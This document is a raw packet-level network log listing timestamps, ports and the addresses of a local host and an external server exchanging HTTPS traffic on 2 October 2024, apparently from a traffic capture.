Oct 2, 2024 06:23:01.282542944 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.282581091 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.282601118 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.282607079 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.282634020 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.282651901 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.332515955 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.332562923 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.332602978 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.332609892 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.332647085 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.332743883 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.332926035 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.332993984 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.335705042 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.463140011 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.463188887 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.463267088 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.463532925 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.463541985 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.099281073 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.101389885 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.101421118 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.363352060 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.363379002 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.363399982 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.363512993 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.363539934 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.363598108 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.450758934 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.450783968 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.450838089 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.450861931 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.450886011 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.450900078 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.452583075 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.452601910 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.452694893 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.452699900 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.452775955 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.538512945 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.538538933 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.538563967 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.538595915 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.538624048 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.538645983 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.538666964 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.538716078 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.538764000 CEST	443	49759	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.538923025 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.539233923 CEST	49759	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.553000927 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.553041935 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:02.553138971 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.553354979 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:02.553368092 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.221113920 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.222381115 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.222399950 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.494131088 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.494157076 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.494173050 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.494270086 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.494297981 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.494395971 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.580157042 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.580178976 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.580333948 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.580364943 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.580775976 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.581475973 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.581490040 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.581567049 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.581573963 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.581670046 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.666218996 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.666238070 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.666331053 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.666358948 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.667515039 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.667536020 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.667615891 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.667615891 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.667622089 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.668201923 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.737792015 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.737811089 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.738852024 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.738873005 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.742733955 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.742753029 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.742769957 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.742777109 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.742800951 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.746664047 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.752985001 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.753000975 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.753099918 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.753099918 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.753113031 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.754375935 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.754393101 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.754407883 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.754415989 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.754484892 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.754484892 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.755316019 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.755328894 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.755523920 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.755530119 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.756659985 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.804145098 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.824600935 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.824618101 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.825372934 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.825416088 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.825428963 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.825453043 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.825470924 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.825485945 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.826281071 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.826294899 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.826370001 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.826370001 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.826389074 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.830178022 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.830193996 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.830687046 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.830702066 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.839958906 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.839977026 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.840534925 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.840555906 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.840579987 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.840601921 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.840630054 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.840630054 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.840666056 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.841098070 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.841110945 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.841173887 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.841173887 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.841181040 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.842678070 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.846268892 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.846268892 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.901529074 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.901555061 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.902801991 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.902833939 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.910677910 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.911349058 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.911366940 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.911860943 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.911897898 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.911904097 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.911920071 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.911936998 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.912506104 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.912518024 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.912539005 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.912587881 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.912587881 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.912594080 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.917061090 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.917076111 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.917162895 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.917162895 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.917169094 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.926843882 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.926856041 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.926943064 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.926949024 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.927541018 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.927557945 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.927628994 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.927628994 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.927634954 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.928154945 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.928167105 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.928245068 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.928245068 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.928248882 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.929980040 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.930676937 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.988481998 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.988504887 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.991257906 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.991285086 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.996822119 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.998523951 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.998543024 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.998672009 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.998681068 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.999156952 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.999185085 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.999254942 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.999254942 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.999260902 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.999625921 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.999639988 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.999721050 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.999721050 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:03.999727964 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:03.999908924 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.003977060 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.003995895 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.006663084 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.006669044 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.013752937 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.013771057 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.013792992 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.013801098 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.013885975 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.013885975 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.014399052 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.014415979 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.014586926 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.014591932 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.014671087 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.015100956 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.015120029 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.020683050 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.020689011 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.020778894 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.075619936 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.075642109 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.075733900 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.075733900 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.075751066 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.076745987 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.085169077 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.085186005 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.085387945 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.085403919 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.085742950 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.085803032 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.085815907 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.086038113 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.086042881 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.086169958 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.086345911 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.086359978 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.086425066 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.086425066 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.086431026 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.086477041 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.090933084 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.090951920 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.091042042 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.091053009 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.095048904 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.097023964 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.100817919 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.100841045 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.101434946 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.101470947 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.101475954 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.101495028 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.101510048 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.102025986 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.102040052 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.102056026 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.102274895 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.102282047 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.145536900 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.162564039 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.162587881 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.164923906 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.164947033 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.170666933 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.172008991 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.172024965 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.172600985 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.172645092 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.172645092 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.172658920 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.172672987 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.173258066 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.173270941 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.173286915 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.173295975 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.173316002 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.176671982 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.178039074 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.178052902 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.178297043 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.178301096 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.179661989 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.187705994 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.187721014 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.187819004 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.187819004 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.187825918 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.188220024 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.188241959 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.188271999 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.188276052 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.188301086 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.188785076 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.188796997 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.189291000 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.189296007 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.239306927 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.249617100 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.249639034 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.249931097 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.249958038 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.250019073 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.258903027 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.258925915 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.259468079 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.259500980 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.259506941 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.259530067 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.259546995 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.259556055 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.260067940 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.260083914 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.260147095 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.260147095 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.260159016 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.264923096 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.264941931 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.265013933 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.265013933 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.265033960 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.274631023 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.274652004 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.275254965 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.275271893 CEST	443	49760	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:04.275310993 CEST	49760	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:04.275310993 CEST	49760	443	192.168.2.4	79.110.49.16
